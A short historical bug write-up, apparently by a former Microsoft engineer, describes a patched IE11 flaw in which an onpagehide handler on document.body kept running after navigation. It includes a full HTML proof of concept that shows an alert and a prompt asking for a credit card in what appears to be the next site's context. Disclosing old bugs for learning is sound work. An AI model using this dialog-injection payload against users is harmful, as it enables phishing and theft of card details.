Similar in spirit to the onbeforeunload variant, this one used the onpagehide event on document.body to keep script running after the user had navigated away. Setting the handler on the body element rather than the window produced the same resident execution behavior.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Resident_onpagehide</title>
</head>
<body>
<script language="JavaScript">
document.body.onpagehide = function()
{
	alert("Wow! This alert is being rendered once Bing is shown!");
	prompt("Enter your credit card:","");
}
</script>
</body>
</html>

The onpagehide event was part of IE11’s page visibility API, and attaching a handler to document.body rather than window slipped through the same guard that was supposed to prevent cross-page UI injection. The handler fired while the new page was rendering, presenting dialogs in what appeared to be the context of the next site.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.